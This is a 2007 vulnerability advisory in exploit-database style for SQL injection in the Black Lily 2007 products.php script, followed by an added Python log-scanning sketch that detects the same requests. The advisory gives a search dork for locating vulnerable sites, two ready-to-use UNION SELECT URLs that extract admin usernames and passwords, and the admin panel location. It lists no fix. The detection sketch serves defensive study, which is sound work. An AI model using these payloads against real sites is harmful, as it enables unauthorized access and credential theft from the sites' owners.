Black Lily 2007 (products.php class) Remote SQL Injection Vulnerability

2007-09-22 00:00:00


found by :
VerY SecReT
###########
HomePage : WwW.SnIpEr-Sa.Com
##################

Dork : "Powered By The Black Lily 2007"
####################################

EXPLOIT:
http://victim.com/ar/products.php?class=-1%20union%20select%201,2,password,4,username%20from%20admin/*

or

http://victim.com/en/products.php?class=-1%20union%20select%201,2,3,password,username%20from%20admin/*

########################################

Admin Panel is in http://victim.com/xx/admin/

#####################################
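
A detection sketch for the requests shown above, added here as an example and not part of the original advisory: it scans web-server access logs for products.php requests whose class parameter is not a plain integer and labels those carrying a UNION SELECT. The log lines, news.php and the page parameter are constructed, and treating class as a numeric ID is an assumption based on the -1 in the advisory's URLs.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed access-log lines for illustration; addresses are documentation IPs,
# news.php and the `page` parameter are made up.
SAMPLE_LOG = """\
192.0.2.10 - - [22/Sep/2007:10:00:01 +0000] "GET /en/products.php?class=3 HTTP/1.1" 200 5120
192.0.2.66 - - [22/Sep/2007:10:00:07 +0000] "GET /ar/products.php?class=-1%20union%20select%201,2,password,4,username%20from%20admin/* HTTP/1.1" 200 2210
192.0.2.66 - - [22/Sep/2007:10:00:09 +0000] "GET /en/products.php?class=-1+UNION+SELECT+1,2,3,password,username+FROM+admin/* HTTP/1.1" 200 2301
192.0.2.11 - - [22/Sep/2007:10:01:00 +0000] "GET /en/news.php?id=7 HTTP/1.1" 200 900
192.0.2.12 - - [22/Sep/2007:10:02:00 +0000] "GET /en/products.php?class=12&page=2 HTTP/1.1" 200 4100
192.0.2.13 - - [22/Sep/2007:10:03:00 +0000] "GET /en/products.php?class=shoes HTTP/1.1" 200 700
"""

REQUEST_RE = re.compile(r'^(\S+) .*?"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
INT_RE = re.compile(r"\d+")  # assumption: a legitimate `class` value is a numeric ID
UNION_RE = re.compile(r"\bunion\b.*\bselect\b", re.IGNORECASE | re.DOTALL)


def suspicious_requests(log_text):
    """Return (client, reason, decoded class value) for each flagged request."""
    hits = []
    for line in log_text.splitlines():
        m = REQUEST_RE.match(line)
        if not m:
            continue
        client, target = m.groups()
        url = urlsplit(target)
        # Only the script named in the advisory, under any language directory.
        if not url.path.lower().endswith("/products.php"):
            continue
        # parse_qs percent-decodes the value and turns '+' into a space.
        for value in parse_qs(url.query, keep_blank_values=True).get("class", []):
            if INT_RE.fullmatch(value):
                continue
            reason = "union-select" if UNION_RE.search(value) else "non-integer"
            hits.append((client, reason, value))
    return hits


if __name__ == "__main__":
    for client, reason, value in suspicious_requests(SAMPLE_LOG):
        print(f"{client}\t{reason}\t{value}")
```

Flagging requests does not remove the flaw; the query built from class still needs an integer cast or a bound parameter.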

S.GreetZ: sniper-sa.com & sniper-sa & Rafoo
#############################
thanx : shoot3r , Devil-X ,ReMOTeR , and all sniper members

##############

contact-mail : [email protected]

Fixes

No fixes